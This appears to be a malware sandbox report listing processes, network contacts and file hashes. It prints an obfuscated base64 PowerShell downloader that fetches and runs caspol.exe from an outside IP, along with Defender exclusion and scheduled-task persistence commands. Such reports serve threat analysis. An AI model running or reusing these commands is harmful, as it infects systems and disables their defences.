| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta"
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 511c43e75c660df11a98089d2e722ac8 |
| SHA1 | 29b4b67e219af20e607ed6eb4fb23e734bf31aeb |
| SHA256 | 9048bc13b8c28e44128a61ff7c76415f52420853bf01dbebaf501eb03ee584b0 |
| SHA512 | e93c17a8fd030615db054a4478337cab201779735bcfb2639c8ed723c16b3728e001811a1a236357391e497d3a349e9d9a05278c28816be28d57be8df959f977 |
\??\c:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline
| MD5 | 3e99a2c1b3a3cfdd8870f044bbe0ae07 |
| SHA1 | f57021d4745ce760b37e2806ca6ebc9dbe9d47fd |
| SHA256 | 740a640a03f70647d38fe6fd169a9c4371ad82cfc206d12665515f1db7a08ec3 |
| SHA512 | 306642a7c023135a30eb2b2ced06aaf7dbebf2ffd0f3a02195ab1298c54cbbbfbab003f96fa265aa4b8472a0b1876fe6aab94620ce13935bf02ed4b3cb983643 |
\??\c:\Users\Admin\AppData\Local\Temp\hs07zwtj.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp
| MD5 | 08231841e49d0ff1e44000a2138277d4 |
| SHA1 | 7b33e37d162578c4da5f4bff81e299bf58158b95 |
| SHA256 | 4cd2cb49122215ee415c3d7272d2bb48f2d2415638bc063dbec22f12d1412fb8 |
| SHA512 | 8996d94dae69d179c83e874d9453c95bc9ccd637ce5a8a4de64ccc5117c3bc5179805949a6d348c3ecc4afb6a4e76abfce3ee69dddfe281aec9e882dadd243c8 |
C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp
| MD5 | 1629b742fe9bb12ee231b3cf19c56c75 |
| SHA1 | eea0867318da1607efac26814417f02f4143e373 |
| SHA256 | 0e8b76d9c7446dd4b7612c1ef4c42697508915df84119deb8ebf7db29843796e |
| SHA512 | badd29397ad0aa758138b7b2c2419aa607b51adcd9b8a04f7ed20cafbe268550065a4337b3a7c7773f105988eac88585f4f7a218a9ce98cf36b13bfb308995c7 |
C:\Users\Admin\AppData\Local\Temp\hs07zwtj.dll
| MD5 | b45173682a7449f2b958017b4acec059 |
| SHA1 | 900a06b161ba8675f40b698b0d2cfe6120b169c6 |
| SHA256 | f0b2b5ee2383e6470967e412b5a6000c3e7d2ad6e700513cebbc07719e2c1a6e |
| SHA512 | 1105b44b3820178fb46fa265e5ff401ac53f3e979e3cd5f6a2c2c29f426325fd6faf16ada178f0e9becfef8c7e3cbbd3dffd68adcaf63ec5609b0c7d1da157a2 |
C:\Users\Admin\AppData\Local\Temp\hs07zwtj.pdb
| MD5 | 9e16775089f02993bcd37f5ecfc46785 |
| SHA1 | 1116e44a47e0adc235d054081386bb617933d42b |
| SHA256 | ea8bf6580c01da53bc451ffa25fced942fbe68f3ed2e70341f0066c06ee965fb |
| SHA512 | 9655eb77c2057471f80a538385887929bdbbf23868e6a9d316da60d7e104e6a793578c3ffc46d66604fdd21fa1030a3d34276c4011781b549d6048326821712a |
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
memory/2640-35-0x0000000001350000-0x00000000013E8000-memory.dmp
memory/2640-36-0x0000000000390000-0x00000000003A2000-memory.dmp
memory/2640-37-0x0000000004BC0000-0x0000000004C24000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp
| MD5 | 1b67e8cceed149b21087e5f364860141 |
| SHA1 | 38836c472a49a5b993bf43b87b8c345961e3a0d9 |
| SHA256 | 5d0543738b465abe90478a6ceeacff369ccd6b9edfcd686f1f75a9f3adc9784c |
| SHA512 | 791c32dd134067ebc489032b0a87abb901790bd2218596f39bc2c9bd520ef0cc549956da3d06f6f2c55679321ed41289005aade54a7ccab85030f9c41b3daa7c |
memory/2244-54-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-67-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-65-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2244-62-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-60-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-58-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-56-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/2244-86-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-95-0x0000000000400000-0x00000000004A2000-memory.dmp